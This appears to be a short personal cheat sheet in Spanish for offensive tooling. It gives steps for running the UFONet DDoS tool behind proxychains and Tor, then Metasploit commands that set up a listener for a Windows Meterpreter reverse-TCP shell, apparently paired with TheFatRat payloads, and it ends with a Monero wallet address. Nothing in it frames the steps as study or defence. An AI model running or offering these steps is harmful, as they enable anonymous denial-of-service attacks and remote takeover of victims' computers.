Crear correo Tor
Meter correo en Grid de UFONET

/ufonet: ~#	proxychains ./ufonet --gui

Configurar proxy http://127.0.0.1:9050

He conseguido usar proxy:

service tor start
/ufonet ~# proxychains ./ufonet --gui
/root/Descargas/Tor (Lo iniciamos) y vamos a localhost:9999



------------------------------



fatrat

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set lhost 192.168.0.17
set lport 4444
show options -- Para verificar
run



------------------------


Monero

4A8aNxURtPTP4be43xJYoH64TgPGVtXiuF6gHErcYrEB7ic6iCdqv35HRLqKCnM6fDVmPUBYRErQ1g6ksaVn12J5ReEBr3L
